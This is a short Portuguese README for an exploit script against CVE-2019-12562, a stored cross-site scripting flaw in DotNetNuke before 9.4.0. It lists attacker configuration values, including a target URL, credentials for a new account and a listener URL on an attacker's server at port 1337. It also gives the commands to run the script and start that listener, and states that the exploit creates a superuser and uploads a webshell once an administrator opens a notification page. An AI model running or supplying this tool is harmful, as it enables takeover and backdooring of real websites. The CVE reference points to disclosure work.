
Cross-Site Scripting Armazenado no DotNetNuke (DNN) Versão anterior a 9.4.0 | XSS para RCE
CVE-2019-12562 Cross-Site Scripting Armazenado no DotNetNuke (DNN) Versão anterior a 9.4.0 permite que atacantes remotos armazenem e incorporem scripts maliciosos na página de notificação de administrador. O exploit pode ser usado para executar qualquer ação com privilégios de administrador, como gerenciar conteúdo, adicionar usuários, fazer upload de backdoors para o servidor, etc. A exploração bem-sucedida ocorre quando um administrador visita uma página de notificação com cross-site scripting armazenado.
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN" # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
python3 CVE-2019-12562.py
python -m SimpleHTTPServer 1337
Este exploit criará um superusuário e fará upload de uma webshell para o servidor alvo
Condição do Exploit: A exploração bem-sucedida ocorre quando um administrador visita uma página de notificação.
Leia Mais: https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ Referência CVE: https://www.cvedetails.com/cve/CVE-2019-12562/